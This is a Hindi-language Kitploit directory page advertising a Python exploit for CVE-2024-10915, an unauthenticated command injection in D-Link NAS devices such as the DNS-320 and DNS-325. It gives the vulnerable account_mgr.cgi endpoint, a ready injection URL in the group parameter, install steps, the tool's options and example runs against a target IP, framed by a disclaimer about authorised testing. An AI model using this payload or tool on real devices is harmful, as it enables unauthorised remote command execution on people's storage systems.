Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-10915 | Kitploit
उपकरण/GitHubGitHub/r0otk3r/cve-2024-10915
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोललर्निंग और शिक्षारेड टीमिंग
GitHubr0otk3r/cve-2024-10915

CVE-2024-10915

रिपॉजिटरी देखें
1 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-10915 - D-Link NAS कमांड इंजेक्शन एक्सप्लॉइट

यह Python-आधारित एक्सप्लॉइट /cgi-bin/account_mgr.cgi?cmd=cgi_user_add एंडपॉइंट के माध्यम से कई D-Link NAS उत्पादों में कमांड इंजेक्शन भेद्यता को लक्षित करता है। यह भेद्यता बिना प्रमाणीकरण वाले हमलावरों को प्रभावित डिवाइस पर मनमाने सिस्टम कमांड निष्पादित करने की अनुमति देती है।

विवरण

CVE-2024-10915 कई D-Link NAS मॉडलों को प्रभावित करता है। एक हमलावर cgi_user_add कमांड में group पैरामीटर के माध्यम से कमांड इंजेक्ट कर सकता है, जिससे रिमोट कोड निष्पादन होता है।

प्रभावित उत्पाद

  • D-Link DNS-320

  • D-Link DNS-320LW

  • D-Link DNS-325

  • D-Link DNS-340L

root@kitploit:~
कमजोर एंडपॉइंट: /cgi-bin/account_mgr.cgi?cmd=cgi_user_add

उदाहरण:

root@kitploit:~
http://192.168.1.100/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&group=';id;'

आवश्यकताएँ

  • Python 3.x

  • requests लाइब्रेरी

आवश्यक निर्भरताएँ स्थापित करें:

root@kitploit:~
pip3 install requests

उपयोग

root@kitploit:~
usage: dlink_nas_rce_cve_2024_10915.py [-h] [-u URL] [-c COMMAND] [-p PROXY] [-o OUTPUT] [-l]

विकल्प:

उदाहरण 1

root@kitploit:~
python3 dlink_nas_rce_cve_2024_10915.py -u "http://TARGET_IP" -c "id" -p "http://127.0.0.1:8080" -o results.txt 
id

उदाहरण 2

root@kitploit:~
python3 dlink_nas_rce_cve_2024_10915.py -u "http://TARGET_IP" -c "uname" -p "http://127.0.0.1:8080" -o results.txt 
uname

उदाहरण 3

root@kitploit:~
python3 dlink_nas_rce_cve_2024_10915.py -u "http://TARGET_IP" -c "ifconfig" -p "http://127.0.0.1:8080" -o results.txt 
ifconfig

⚠️ अस्वीकरण

यह प्रोजेक्ट केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए है। इस टूल का उपयोग उन नेटवर्कों या सिस्टमों पर न करें जिनके लिए आपके पास स्पष्ट अनुमति नहीं है। लेखक किसी भी दुरुपयोग या हुई क्षति के लिए कोई ज़िम्मेदारी नहीं लेते हैं।


आधिकारिक चैनल

  • YouTube @rootctf
  • X @r0otk3r
टूल डाउनलोड करें
विकल्पविवरण
-u / --urlलक्ष्य बेस URL (जैसे http://192.168.1.100)
-c / --commandडिवाइस पर निष्पादित करने के लिए कमांड (डिफ़ॉल्ट: id)
-p / --proxyHTTP प्रॉक्सी का उपयोग करें (जैसे http://127.0.0.1:8080)
-o / --outputHTTP प्रतिक्रिया को फ़ाइल में सहेजें
-l / --listप्रभावित D-Link NAS उत्पादों की सूची दिखाएँ